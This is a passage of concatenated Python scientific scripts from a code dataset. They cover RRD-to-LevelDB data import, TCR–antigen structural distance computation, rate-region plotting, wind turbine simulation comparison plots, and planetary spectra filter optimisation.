(an xml file)\n# and writes the data to a levelDB, with keys 'TOPIC/timestamp'.\n# Choosing whether 'dump' or 'xport' is done by un/commenting below.\n#\n# An example for xport:\n# rrdtool xport --start 1393632000 --end 1412802000 --step 3600 --maxrows 6000 DEF:temp=nRFtemp.rrd:temperature:AVERAGE XPORT:temp:\"nRFtemp\" > nrftemp.xml\n# [start/end are 'epoch' seconds; can get them by\n# ruby -e 'puts Time.new(2014,10,8,22,0,0, \"+01:00\").to_i'\n# step: in seconds\n# maxrows: need to increase this, otherwise the default 400 will be used, which\n# may automatically increase the step to match this]\n#\n\nimport plyvel\nimport re\n\nDBASE = \"../../leveldatabase\"\nRRDXML = \"nrftemp.xml\"\nTOPIC = b'env/sitting/node/high/temp/'\n\ndb = plyvel.DB(DBASE) # , create_if_missing=True\nwb = db.write_batch()\n\n# this regex is for 'dump'ed xml:\n#r = re.compile('^\\s+<row><v> ([0-9.e+]+)<\\/v><\\/row>')\n\n# this one is for 'xport'ed xml:\nr = re.compile('^\\s+<row><t>(\\d+)<\\/t><v>([0-9.e+]+)<\\/v><\\/row>')\n\nwith open(RRDXML) as f:\n    for line in f:\n        m = r.match(line)\n        if m != None:\n            time = int(m.group(1))\n            value = float(m.group(2))\n#            print(\"Time:\"+str(time)+\" Value:\"+str(value))\n            wb.put(TOPIC+bytes(str(time),'ascii'), bytes(str(value),'ascii'))\n\nwb.write()\ndb.close()\n","sub_path":"rrd-to-leveldb/rrd-to-leveldb.py","file_name":"rrd-to-leveldb.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"34582166","text":"from __future__ import print_function\n\nimport argparse\nimport warnings\nimport pandas as pd\nimport time\n\nfrom Bio.PDB import *\nfrom shutil import rmtree\nfrom util import *\nfrom os import chdir, path, makedirs\n\nwarnings.filterwarnings(\"ignore\")\n\nparser = argparse.ArgumentParser(description=\"structure.py\")\nparser.add_argument(\"-i\", nargs=1, type=str, default=\"../../result/final.annotations.txt\",\n                    help=\"Annotation table path.\")\nparser.add_argument(\"-o\", nargs=1, type=str, default=\"../../result/structure.txt\",\n                    help=\"Output table path.\")\nparser.add_argument(\"-m\", nargs=1, type=str, default=\"../../result/structure_mock.txt\",\n                    help=\"Mock complexes output table path.\")\nparser.add_argument(\"-t\", nargs=1, type=str, default=\"../tmp/\",\n                    help=\"Temporary folder path\")\nparser.add_argument(\"--pdbfixer\", action=\"store_true\",\n                    help=\"Fix PDB files with PDBFixer (time-consuming!).\")\nparser.add_argument(\"--mock\", action=\"store_true\",\n                    help=\"Generate mock complexes (negative controls).\")\n\nargs = parser.parse_args()\n\nif type(args.i) is list:\n    args.i = args.i[0]\ninput_file = path.abspath(args.i)\nif type(args.o) is list:\n    args.o = args.o[0]\noutput_file = path.abspath(args.o)\nif type(args.m) is list:\n    args.m = args.m[0]\noutput_file_mock = path.abspath(args.m)\nuse_pdbfixer = args.pdbfixer\ngenerate_mock = args.mock\n\nchdir(path.dirname(path.realpath(__file__)))\n\n# Create temporary folders\npdb_dir = path.abspath(args.t + '/pdb/')\n\nif not path.exists(pdb_dir):\n    makedirs(pdb_dir)\n\n# Writing output file header; we'll drop some original annotation\n# columns such as chain identifiers, etc.\ncol_names = ['pdb_id', 'species',\n             'mhc_type', 'mhc_a_allele', 'mhc_b_allele',\n             'antigen_seq', 'tcr_gene',\n             'tcr_v_allele', 'tcr_region', 'tcr_region_seq',\n             'aa_tcr', 'aa_antigen', 'len_tcr', 'len_antigen',\n             'pos_tcr', 'pos_antigen',\n             'distance', 'distance_CA']\n\nwith open(output_file, 'w') as f:\n    f.write('\\t'.join(col_names) + '\\n')\n\n# Main 
loop\n\npdb_list = PDBList()\npdb_parser = PDBParser()\n\ntable = pd.read_table(input_file)\n\nbypdb = table.groupby(\"pdb_id\")\n\ni = 0\n\ndf_residues = []\n\nfor pdb_id, pdb_group in bypdb:\n # Load PDB file\n pdb_file = pdb_list.retrieve_pdb_file(pdb_id, pdir=pdb_dir)\n\n print(\"[\", time.strftime(\"%c\"), i, \"/\", table.shape[0], \"]\")\n print(pdb_id, \"- preparing for computation\")\n\n # Load model from original pdb file\n # In case of PDBFixer option it will be used to find\n # region ranges by overlapping Calpha atom positions\n model_original = pdb_parser.get_structure(pdb_id, pdb_file)[0]\n\n if use_pdbfixer:\n print(pdb_id, \"-- fixing PDB\")\n pdb_file_fixed = fix_pdb(pdb_id, pdb_file, pdb_group)\n # fixed model\n model = pdb_parser.get_structure(pdb_id, pdb_file_fixed)[0]\n else:\n model = model_original\n\n # Store annotation for entire complex\n pdb_annot = pdb_group.iloc[0]\n\n # Get and check antigen residues\n antigen_chain_id = pdb_annot['chain_antigen']\n antigen_chain = model[antigen_chain_id]\n antigen_seq = pdb_annot['antigen_seq']\n antigen_range = range(len(antigen_seq))\n\n if use_pdbfixer:\n antigen_residues = get_residues_pdbfixer(antigen_chain, antigen_range,\n model_original[antigen_chain_id])\n else:\n antigen_residues = get_residues(antigen_chain, antigen_range)\n\n antigen_seq_obs = get_seq(antigen_residues)\n\n if antigen_seq != antigen_seq_obs:\n warning(pdb_id, \"Antigen sequence mismatch (expected observed):\", antigen_seq,\n antigen_seq_obs, \". Replacing with one from PDB.\")\n pdb_annot['antigen_seq'] = antigen_seq_obs\n\n mhc_type = pdb_annot['mhc_type']\n\n # Iterate by TCR chain/region (CDR1,2,3 )\n byregion = pdb_group.groupby(['chain_tcr', 'tcr_region'])\n results_by_pdb = []\n for tcr_region_id, tcr_region_group in byregion:\n # Get and check tcr region residues\n tcr_annot = tcr_region_group.iloc[0]\n tcr_region_name = tcr_annot['tcr_region']\n\n if tcr_region_name.startswith(\"FR\"):\n continue\n\n tcr_v_name = tcr_annot['tcr_v_allele']\n tcr_gene = tcr_v_name[0:3]\n tcr_chain_id = tcr_annot['chain_tcr']\n tcr_chain = model[tcr_chain_id]\n tcr_region_seq = tcr_annot['tcr_region_seq']\n tcr_region_range = range(tcr_annot['tcr_region_start'],\n tcr_annot['tcr_region_end'])\n\n if use_pdbfixer:\n tcr_region_residues = get_residues_pdbfixer(tcr_chain, tcr_region_range,\n model_original[tcr_chain_id])\n else:\n tcr_region_residues = get_residues(tcr_chain, tcr_region_range)\n\n tcr_region_seq_obs = get_seq(tcr_region_residues)\n\n if tcr_region_seq != tcr_region_seq_obs:\n warning(pdb_id, \"TCR:\", tcr_region_id, \" sequence mismatch (expected observed): \",\n tcr_region_seq, tcr_region_seq_obs,\n \". 
Replacing with one from PDB.\")\n tcr_annot['tcr_region_seq'] = tcr_region_seq_obs\n\n # we'll need this for mock complexes\n if generate_mock: #and tcr_region_name == \"CDR3\":\n df_residues.append({'pdb_id': pdb_id,\n 'mhc_type': mhc_type,\n 'ag_seq': antigen_seq_obs,\n 'tcr_seq': tcr_region_seq_obs,\n 'ag_residues': antigen_residues,\n 'tcr_gene': tcr_gene,\n 'tcr_region': tcr_region_name,\n 'tcr_residues': tcr_region_residues})\n\n # Compute distances and add them to results\n\n print(pdb_id, \"- computing distances for\", tcr_v_name,\n ':', tcr_region_id[1])\n\n distances = calc_distances(tcr_region_residues, antigen_residues)\n\n # Append annotation\n for row in distances:\n row.update(tcr_annot.to_dict())\n row.update({'tcr_gene': tcr_gene,\n 'tcr_v_allele': tcr_v_name,\n 'tcr_region': tcr_region_name})\n\n results_by_pdb.extend(distances)\n\n i += 1\n\n # Write selected columns\n res = pd.DataFrame(results_by_pdb)[col_names]\n res.to_csv(output_file, sep='\\t', header=False, index=False, mode='a')\n print(\"Done\")\n\nprint(\"Finished processing\", table.shape[0], \"entries.\")\n\nif generate_mock:\n print(\"Generating mock complexes.\")\n\n col_names_mock = ['mhc_type', 'tcr_gene', 'tcr_region',\n 'pdb_id_a', 'pdb_id_t',\n 'ag_seq_a', 'ag_seq_t',\n 'tcr_seq_a', 'tcr_seq_t',\n 'aa_tcr', 'aa_antigen',\n 'len_tcr', 'len_antigen',\n 'pos_tcr', 'pos_antigen',\n 'distance', 'distance_CA']\n\n with open(output_file_mock, 'w') as f:\n f.write('\\t'.join(col_names_mock) + '\\n')\n\n results_mock = []\n\n df_residues = pd.DataFrame(df_residues)\n\n # split in two tables\n\n df_res_tcr = df_residues[['pdb_id', 'ag_seq', 'tcr_seq',\n 'tcr_gene', 'tcr_region', 'tcr_residues']]\n\n df_res_tcr.columns = ['pdb_id_t', 'ag_seq_t', 'tcr_seq_t',\n 'tcr_gene', 'tcr_region', 'tcr_residues_t']\n\n df_res_ag = df_residues[['pdb_id', 'mhc_type', 'ag_seq', 'tcr_seq',\n 'ag_residues', 'tcr_gene', 'tcr_region',\n 'tcr_residues']]\n\n df_res_ag.columns = ['pdb_id_a', 'mhc_type', 'ag_seq_a', 'tcr_seq_a',\n 'ag_residues', 'tcr_gene', 'tcr_region',\n 'tcr_residues_a']\n\n # merge (+ cartesian product)\n\n df_res = pd.merge(df_res_tcr, df_res_ag,\n on = ['tcr_gene', 'tcr_region'])\n\n # filter\n\n df_res = df_res[(df_res.pdb_id_t != df_res.pdb_id_a) &\n (df_res.ag_seq_t != df_res.ag_seq_a) &\n (df_res.tcr_seq_t != df_res.tcr_seq_a)]\n\n # compute distances for all pairs\n\n for index, row in df_res.iterrows():\n if index % 100 == 0:\n print(\"[\", time.strftime(\"%c\"), index, \"/\", df_res.shape[0], \"]\",\n \"Processing mock entry\", row['pdb_id_a'], row['pdb_id_t'],\n row['ag_seq_a'], row['tcr_seq_t'])\n\n # transfer CDRs to expected position in original pMHC\n tcr_residues_new = superimpose(row['tcr_residues_a'],\n row['tcr_residues_t'],\n row['tcr_region'])\n\n distances = calc_distances(tcr_residues_new, row['ag_residues'])\n\n for row2 in distances:\n row2.update(row.to_dict())\n\n res = pd.DataFrame(distances)[col_names_mock]\n res.to_csv(output_file_mock, sep='\\t', header=False, index=False, mode='a')\n\n print(\"Finished processing\", df_res.shape[0], \"mock entries.\")\n","sub_path":"preprocessing/structure/src/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":9152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"18239329","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass RateRegion():\n def __init__(self, MI0, MI1, MI0_1, MI1_0, MI_sum):\n self.MI0 = MI0\n self.MI1 = MI1\n self.MI0_1 = MI0_1\n 
self.MI1_0 = MI1_0\n self.MI_sum = MI_sum\n\n def print(self):\n print('MI0 = {:.3f}'.format(self.MI0))\n print('MI1 = {:.3f}'.format(self.MI1))\n print('MI0_1 = {:.3f}'.format(self.MI0_1))\n print('MI1_0 = {:.3f}'.format(self.MI1_0))\n print('MI_sum = {:.3f}'.format(self.MI_sum))\n\n def plot(self, ax):\n ax.plot([0, self.MI0], [self.MI1_0]*2,'b-')\n ax.plot([self.MI0, self.MI0_1], [self.MI1_0,self.MI1], 'b-')\n ax.plot([self.MI0_1]*2, [self.MI1, 0], 'b-')\n R_min = np.min([self.MI0_1, self.MI1_0])\n ax.plot([0,R_min], [0,R_min], 'r--')\n ax.plot([0,self.MI0_1], [self.MI1]*2, '--', color='grey')\n ax.plot([self.MI0]*2, [0,self.MI1_0], '--', color='grey')\n\n def get(self):\n return self.MI0, self.MI1, self.MI0_1, self.MI1_0, self.MI_sum\n\n @staticmethod\n def average(rr1, rr2):\n MI0 = (rr1.MI0+rr2.MI0)/2\n MI1 = (rr1.MI1+rr2.MI1)/2\n MI0_1 = (rr1.MI0_1+rr2.MI0_1)/2\n MI1_0 = (rr1.MI1_0+rr2.MI1_0)/2\n MI_sum = (rr1.MI_sum+rr2.MI_sum)/2\n return RateRegion(MI0, MI1, MI0_1, MI1_0, MI_sum)\n\n\ndef plot_rate_region(C, I, N):\n plt.plot([0,np.log2(1+C/(I+N))],[np.log2(1+I/N)]*2,'b-')\n plt.plot([np.log2(1+C/(I+N)), np.log2(1+C/N)], [np.log2(1+I/N), np.log2(1+I/(C+N))], 'b-')\n plt.plot([np.log2(1+C/N)]*2, [np.log2(1+I/(C+N)),0], 'b-')\n R_min = np.min([np.log2(1+C/N), np.log2(1+I/N)])\n plt.plot([0,R_min],[0,R_min],'r--')\n plt.title('C={:.2g}, I={:.2g}, N={:.2g}'.format(C,I,N))\n plt.grid()\n plt.show()\n","sub_path":"sigcom/it/rate_region.py","file_name":"rate_region.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"92365779","text":"\"\"\"\nPlot comparison of turbine models\n\"\"\"\nimport sys\nlibpath = 'C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\dissertation'\nif (libpath not in sys.path): sys.path.append(libpath)\n\nimport JR_Library.main as jr\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\n\n\n# specify the directory to write the files to\n#turbs = ['WP1500', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1500_FAST_v7'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5_Linux'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP1.5A08V03', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP1.5A08V03')]\n#turbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00')]\nturbs = ['WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_dynin')]\n#turbs = ['WP0.75A08V00', 
os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00'),\\\n# 'WP0.75A08V00', os.path.join('\\\\\\\\monsoon-data\\\\Public\\\\JRinker\\\\' + \\\n# 'fast_simulations\\\\FastDir\\\\SmallRun','WP0.75A08V00')]\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_stifftwr'),\\\n# 'WP0.75A08V00', os.path.join('C:\\\\Users\\\\jrinker\\\\Documents\\\\GitHub\\\\' + \\\n# 'dissertation\\\\FAST_models\\\\FAST7','WP0.75A08V00_stiffblds')]\n#fileIDs = ['_42331','_42331','_42331','_42331','_42331']\n#fileIDs = ['_91242','_91242','_91242','_91242','_91242']\nfileIDs = ['_00000','_00000','_00000','_00000','_00000']\n#fileIDs = ['_00000','_00001']\n\nt_plot = [30,630]\n\nPlotFields = ['Time','WindVxi','RotSpeed','GenPwr',\n 'BldPitch1','TSR','GenTq','YawBrTAxp','OoPDefl1']\n#leg_str = ['Linux 1.5','Windows 1.5']\n#leg_str = ['Standard pitch','Modified GS']\n#leg_str = ['Standard model','Modified GBR','Stiffened tower',\n# 'Stiffened blades','Extra damp']\nleg_str = ['EQUIL','DYNIN']\n#leg_str = ['Desktop','Monsoon']\nc = ['b','r','g','c','m','y','k']\n\nfig1 = plt.figure(5,figsize=(6.5,10))\nplt.clf()\n\nfor i in range(len(turbs)/2):\n \n TName = turbs[2*i]\n turb_dir = turbs[2*i+1]\n \n fname = os.path.join(turb_dir,TName+fileIDs[i])\n FAST = jr.ReadFASTFile(fname+'.out')\n \n t = FAST['Data'][:,FAST['Fields'].index('Time')]\n \n print(FAST['Data'][:,FAST['Fields'].index('OoPDefl1')].max())\n \n for i_plot in range(len(PlotFields)-1):\n ax = fig1.add_subplot(len(PlotFields)-1,1,i_plot+1)\n \n y = FAST['Data'][:,FAST['Fields'].index(PlotFields[i_plot+1])]\n ax.plot(t,y,c[i],label=leg_str[i])\n ax.set_title(PlotFields[i_plot+1])\n# if i_plot < len(PlotFields)-2:\n# ax.set_ylim([np.mean(y)*0.95,np.mean(y)*1.05])\n if i_plot == 0:\n ax.legend()\n \n ax.set_xlim(t_plot)\n \nplt.tight_layout()","sub_path":"FAST_models/WindPACT/code/plot-turbine_comparison.py","file_name":"plot-turbine_comparison.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"367699528","text":"from __future__ import print_function\nimport math\nimport corner\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport emcee\nimport pdb\nimport time\nimport pickle as pc\nfrom difference_metric import *\n\n# Import solar system spectra\n\nsol_data = np.loadtxt('SunKuruczSpectrum.txt')\n\nearth_data = np.loadtxt('earth.txt')\n\njup_data = np.loadtxt('Jupiter_geo_albedo.txt')\n\n#ven_data = np.loadtxt('Venus_geo_albedo.txt') #3d array\n\nmars_data = np.loadtxt('Mars_geo_albedo.txt')\n\nnep_data = np.loadtxt('Neptune_geo_albedo.txt')\n\nsat_data = np.loadtxt('planets_2/Saturn_geo_albedo.txt')\n\nven_data = np.loadtxt('planets_2/Venus_geo_albedo.txt', skiprows=9)\n\n# Early solar\narchearth_data = np.loadtxt('planets_2/ArcheanEarth_geo_albedo.txt')\n\n# Get specific x (wavelengths in microns) and y (spectral flux density or albedo)\nx_sol = sol_data[:,0]\nx_ear = earth_data[:,0]\nx_jup = jup_data[:,0]\nx_mars = mars_data[:,0]\nx_nep = nep_data[:,0]\nx_sat = sat_data[:,0]\nx_ven = ven_data[:,0]\nx_archearth = archearth_data[:,0]\n\ny_sol = sol_data[:,1]\ny_ear = earth_data[:,2]\ny_jup = jup_data[:,1]\ny_mars = mars_data[:,1]\ny_nep = nep_data[:,1]\ny_sat = sat_data[:,1]\ny_ven = ven_data[:,1]\ny_archearth = archearth_data[:,1]\n\n### y-column of earth data is albedo- must 
multiply by solar flux to get reflective flux (which requires us to interpolate the solar spectrum to the earth's wavelength grid)\n\ny_sol_interp_ear = np.interp(x_ear,x_sol,y_sol) #solar flux values interpolated to earth's grid\n\nflux_earth = y_sol_interp_ear * y_ear #interpolated solar flux values * earth's alebdo\n\ny_sol_interp_jup = np.interp(x_jup,x_sol,y_sol) #solar flux values interpolated to jupiters's grid\n\nflux_jup = y_sol_interp_jup *y_jup #interpolated solar flux values * jupiters's alebdo\n\n\ny_sol_interp_mars = np.interp(x_mars,x_sol,y_sol) #solar flux values interpolated to mars' grid\n\nflux_mars = y_sol_interp_mars * y_mars #interpolated solar flux values * mars' alebdo\n\ny_sol_interp_nep = np.interp(x_nep,x_sol,y_sol) #solar flux values interpolated to neptune's grid\n\nflux_nep = y_sol_interp_nep * y_nep #interpolated solar flux values * neptune's alebdo\n\ny_sol_interp_sat = np.interp(x_sat,x_sol,y_sol) #solar flux values interpolated to mars' grid\n\nflux_sat = y_sol_interp_sat * y_sat #interpolated solar flux values * mars' alebdo\n\ny_sol_interp_ven = np.interp(x_ven,x_sol,y_sol) #solar flux values interpolated to ventune's grid\n\n#pdb.set_trace()\n\nflux_ven = y_sol_interp_ven * y_ven #interpolated solar flux values * ventune's alebdo\n\ny_sol_interp_archearth = np.interp(x_archearth ,x_sol,y_sol) #solar flux values interpolated to archearth's grid\n\nflux_archearth = y_sol_interp_archearth * y_archearth #interpolated solar flux values * archearth's alebdo\n\n# Not main 4 spectra\nwl = np.loadtxt('planets_2/wavelengths.txt')\n\n# Save to easy to remember variables\n#earth = np.array([flux_earth,y_ear])\n#jup = np.array([flux_jup,y_jup])\n#mars = np.array([flux_mars,y_mars])\n#nep = np.array([flux_nep,y_nep])\n\nearth = [x_ear, flux_earth]\njup = [x_jup, flux_jup]\nmars = [x_mars, flux_mars]\nnep = [x_nep, flux_nep]\nsat = [x_sat, flux_sat]\nven = [x_ven, flux_ven]\narchearth = [x_archearth, flux_archearth]\n\nplanet_dict = {\n 'earth': earth,\n 'jupiter': jup,\n 'mars': mars,\n 'neptune': nep,\n 'saturn': sat,\n 'venus': ven,\n 'archearth': archearth,\n }\n\n# Automated importing beyond this point\nwith open(\"import_spectra.txt\",\"r\") as infile:\n lines = infile.readlines()\n\nfor line in lines:\n items = line.split()\n filename = items[0]\n if len(items) > 1:\n keyname = items[1]\n else:\n keyname = filename.split('/')[1]\n\n if filename[0] not in ['*','#']:\n print(\"Importing\", filename)\n\n # check to make sure the first line is not a str\n rowSkip = 0\n with open(filename,'r') as infile:\n lines = infile.readlines()\n for line in lines:\n if len(line.strip()) == 0:\n rowSkip += 1\n elif line.strip()[0] not in [str(n) for n in range(10)]:\n rowSkip += 1\n else:\n break\n\n if rowSkip < len(lines):\n data = np.loadtxt(filename, skiprows=rowSkip)\n x = data[:,0]\n y = data[:,1]\n\n y_sol_interp = np.interp(x,x_sol,y_sol)\n\n flux = y_sol_interp * y\n\n planet_dict[keyname] = [x, flux]\n\n else:\n pdb.set_trace()\n print(\"Import failed!\",filename)\n\n\n\n# Plot the spectra\nfor key in planet_dict.keys():\n wl = planet_dict[key][0]\n flux = planet_dict[key][1]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(wl, flux, ls = '-', marker = '')\n ax.set_xlabel(\"Wavelength (microns)\")\n ax.set_ylabel(\"Flux\")\n ax.set_title(str(key) + \" spectrum\")\n plt.savefig(str(key) + \"_spectrum.pdf\")\n\n#Convert solar jansky as a function of frequency to wavelength\nc = 3e10 #cm/s\nh = 6.626e-27\nep = h*c/x_sol #energy per photon\ny_sol = 
sol_data[:,1]*10e-23 #convert jansky into cgs unit (ergs/s/cm^2/hz)\ny_sol = y_sol*(c/x_sol**2) #convert Jansky to spectral irradiance in terms of wavelength\n\n#DEFINE FILTER VARIABLES\nlambda_min = 0.3 # blue edge in microns\nlambda_max = 2.4 # red edge in microns\nminimum_bin = .1 #minimum bin size in microns\nbin_sep = .1\nnumber_of_bins = 3\n\n\nmin_lambda=0.2\nf1_f = 0.4\nf2_i = 0.4\nf2_f = 0.85\nf3_i = 1.8\nmax_lambda= 1.8\n\nranges = [min_lambda, f1_f, f2_i, f2_f, f3_i, max_lambda]\n\n# Defining a function to calculate the differences between spectra in a given\n# wavelength band\ndef dwl(x, spectra1, spectra2):\n '''\n Calculates the difference between two spectra within given wavelength regions\n\n Note that this will always return a positive value.\n\n Make sure the input spectra have the same wavelength values, interpolate if\n necessary\n\n The input spectra should have the form [wl,flux]\n\n Inputs:\n - x: bin definitions (ndarray)\n - spectra1: the first spectra (ndarray)\n - spectra2: the second spectra (ndarray)\n\n Outputs:\n - diffsum: the sum of differences in the given wavelength region\n (positive float)\n '''\n diffsum = 0\n for i in range(len(x)):\n if i % 2 == 0:\n if i >= len(x)-1:\n break\n\n wlrange = (x[i],x[i+1])\n\n # Trim the spectra\n mask1 = (spectra1[0] > x[i]) & (spectra1[0] < x[i+1])\n spectra1_trimmed = [spectra1[0][mask1],spectra1[1][mask1]]\n\n mask2 = (spectra2[0] > x[i]) & (spectra2[0] < x[i+1])\n spectra2_trimmed = [spectra2[0][mask2],spectra2[1][mask2]]\n\n # Compare along these lines\n # Integrate both ranges\n SPEC1 = np.trapz(spectra1[1], spectra1[0])\n SPEC2 = np.trapz(spectra2[1], spectra2[0])\n diffsum += SPEC1 + SPEC2\n\n return diffsum\n\ndef modify_x(in_x, modifier = 0, simple=False):\n '''\n Puts a vector x into the proper form we need for analysis\n '''\n x = in_x.copy()\n\n if simple == False:\n for i in range(len(x)):\n if i+1 < len(x):\n x[i] = (x[i] * (ranges[i+1] - ranges[i] + modifier) + ranges[i]\n - modifier)\n else:\n x[i] = (x[i] * (ranges[i] - ranges[i-1] + modifier)\n + ranges[i-1] - modifier)\n\n elif simple == \"decent\":\n for i in range(len(x)):\n if i == 0:\n x[i] = (x[i] + 1) * ranges[i]\n\n else:\n x[i] = (1+x[i]) * x[i-1]\n\n elif simple == \"bands\":\n for i in range(len(x)):\n if i % 2 == 0:\n x[i] = x[i] * (ranges[i+1] - ranges[i]) + ranges[i]\n x[i+1] = x[i+1] * (ranges[i+1] - ranges[i]) * .15 + x[i]\n else:\n for i in range(len(x)):\n x[i] = x[i] * (ranges[-1] - ranges[0]) + ranges[0]\n\n # Force all max bin to be the maximum\n if x[-1] > max_lambda:\n x[-1] = max_lambda\n\n return x\n\n## Probability density function\n#def lnprob(x, spectra1, spectra2, modifier, verbose = False, use_fun = False):\n# '''\n# Probability density function used to calculate each walker's (`x`) likelihood.\n#\n# Inputs:\n# - x: a single vector of parameters used for a given result.\n# - spectra1: first input spectra\n# - spectra2: second input spectra\n# - modifier: a modifier that changes minimum distance between the bins\n# - verbose: returns information about why something returns -np.inf\n# '''\n# # Log difference\n# #for el in x:\n# # if el > 1:\n# # raise ValueError('x is somehow greater than 1 with value ' + str(x))\n# nx = modify_x(x, modifier, simple=\"bands\")\n# if not use_fun:\n# diff = dwl(nx,spectra1,spectra2)\n# else:\n# diff = fun(nx,spectra1,spectra2)\n#\n# # Check to make sure all conditions are met\n# # All greater than the minimum wavelength\n# if True in [xi < min_lambda for xi in nx]:\n# #print('LNPROB -inf, 
less than MIN')\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"LESS THAN MIN\"\n#\n# # All less than maximum wavelength\n# if True in [xi > max_lambda for xi in nx]:\n# #print('LNPROB -inf, greater than MAX: ' + str(nx[-1]))\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"GREATER THAN MAX\"\n#\n# # All positive values for the scalars\n# if True in [xi < 0 for xi in x]:\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"NEGATIVE SCALAR\"\n#\n# for i in range(len(nx)):\n# if i > 0:\n# # Sequential increase\n# #if nx[i] < nx[i-1]:\n# # #print('LNPROB -inf,',nx[i],'>',nx[i+1])\n# # if not verbose:\n# # return -np.inf\n# # else:\n# # return -np.inf, \"NOT IN ASCENDING ORDER\"\n#\n# # Bins are sufficiently separated \n# if i % 2 == 0:\n# if np.absolute(nx[i] - nx[i-1]) < bin_sep:\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS NOT SUFFICIENTLY SEPARATED\"\n#\n# elif i+1 != len(nx):\n# # Minimum bin size\n# if np.absolute(nx[i] - nx[i+1]) < minimum_bin:\n# #print('LNPROB -inf, bin too small')\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS ARE TOO SMALL\"\n#\n# if np.absolute(nx[i] - nx[i-1]) > .15*(ranges[i] - ranges[i-1]):\n# if not verbose:\n# return -np.inf\n# else:\n# return -np.inf, \"BINS TOO LARGE\"\n#\n#\n# # Return lnprob\n# #print(np.log(diff))\n# #pdb.set_trace()\n# if not verbose and diff != np.nan and not math.isnan(diff):\n# return np.log(diff)\n# elif diff == np.nan or math.isnan(diff):\n# if verbose:\n# return -np.inf, \"NAN\"\n# else:\n# return -np.inf\n# else:\n# if diff < 0:\n# return -np.inf\n# return np.log(diff), \"ALL GOOD\"\n\n#OBJECTIVE FUNCTION fun\ndef fun(x, spectra1, spectra2):\n\n #Planets = [earth_data, jup_data, mars_data, nep_data]\n\n ## these are the start and endpoints of three bins:\n a1=x[0]\n b1=x[1]\n a2=x[2]\n b2=x[3]\n a3=x[4]\n b3=x[5]\n\n bins=[[a1,b1],[a2,b2],[a3,b3]]\n\n #~~~ EARTH ~~~#\n\n x_ear = spectra1[0]\n flux_earth = spectra1[1]\n\n #Filter 1\n #np.where returns elements, either x or y, depending on condition\n #find index of elements where (from a to b)\n xindex1 = np.where(np.logical_and(x_ear >= x[0], x_ear <= x[1]))\n\n #make an earth x array that corresponds to x index (wavelength)\n earth_xarray1 = x_ear[xindex1]\n #print earth_xarray1\n #find y values corresponding to x range (flux)\n earth_yarray1 = flux_earth[xindex1]\n #print ('ha')\n #print flux_earth[xindex1], xindex1\n\n #integrate values in yarray to give total flux for wavelength range\n flux_earth1 = np.trapz(earth_yarray1,x=earth_xarray1)\n #print flux_earth1\n\n #Filter 2\n xindex2 = np.where(np.logical_and(x_ear >= x[2], x_ear <= x[3]))\n\n earth_xarray2 = x_ear[xindex2]\n\n earth_yarray2 = flux_earth[xindex2]\n\n flux_earth2 = np.trapz(earth_yarray2,x=earth_xarray2)\n\n #Filter 3\n xindex3 = np.where(np.logical_and(x_ear >= x[4], x_ear <= x[5]))\n\n earth_xarray3 = x_ear[xindex3]\n\n earth_yarray3 = flux_earth[xindex3]\n\n flux_earth3 = np.trapz(earth_yarray3,x=earth_xarray3)\n flux_earth3\n\n #~~~ PLANET 2 ~~~#\n\n\n x_p = spectra2[0]\n flux_p = spectra2[1]\n\n 